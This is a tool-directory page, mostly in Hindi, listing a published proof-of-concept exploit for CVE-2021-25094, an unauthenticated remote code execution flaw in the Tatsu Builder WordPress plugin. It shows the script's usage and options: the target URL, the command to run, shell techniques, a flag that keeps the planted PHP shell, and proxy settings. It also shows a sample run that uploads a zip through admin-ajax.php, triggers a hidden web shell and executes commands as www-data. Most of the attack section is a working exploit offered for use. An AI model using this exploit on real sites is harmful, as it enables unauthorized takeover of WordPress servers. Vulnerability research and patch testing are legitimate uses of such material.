Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-25094-tatsu-preauth-rce — बिना प्रमाणीकरण के Tatsu Builder WordPress प्लगइन में रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (CVE-2021-25094)। एकाधिक शेल तकनीकों, प्रॉक्सी और संपीड़न स्तरों का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/darkpills/cve-2021-25094-tatsu-preauth-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubdarkpills/cve-2021-25094-tatsu-preauth-rce

CVE-2021-25094-tatsu-preauth-rce

बिना प्रमाणीकरण के Tatsu Builder WordPress प्लगइन में रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (CVE-2021-25094)। एकाधिक शेल तकनीकों, प्रॉक्सी और संपीड़न स्तरों का समर्थन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
932 साल पहलेअभी तक समीक्षित नहीं

Tatsu builder Wordpress प्लगइन में Preauth RCE (CVE-2021-25094)

Tatsu Builder <= 3.3.11 में एक अप्रमाणित RCE का सरल PoC एक उदाहरण के रूप में प्रदान किया गया है।

पूरा लेख यहाँ: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/

उपयोग:

root@kitploit:~
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd

positional arguments:
  url                   Wordpress असुरक्षित URL (उदाहरण: https://mywordpress.com/)
  cmd                   OS कमांड निष्पादित करने के लिए

optional arguments:
  -h, --help            यह सहायता संदेश दिखाएं और बाहर निकलें
  --technique TECHNIQUE
                        शेल तकनीक: php | htaccess | custom
  --customShell CUSTOMSHELL
                        एक कस्टम PHP शेल फ़ाइल प्रदान करें जो $_POST['text'] इनपुट के रूप में base64 cmd लेगी
  --keep KEEP           अपलोड किए गए PHP शेल को स्वचालित रूप से नष्ट न करें
  --proxy PROXY         HTTP प्रॉक्सी निर्दिष्ट करें और उपयोग करें (उदाहरण: http://localhost:8080)
  --compressionLevel COMPRESSIONLEVEL
                        ज़िप फ़ाइल का संपीड़न स्तर (0 से 9, डिफ़ॉल्ट 9)

उदाहरण:

root@kitploit:~
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)

[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit success!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done
टूल डाउनलोड करें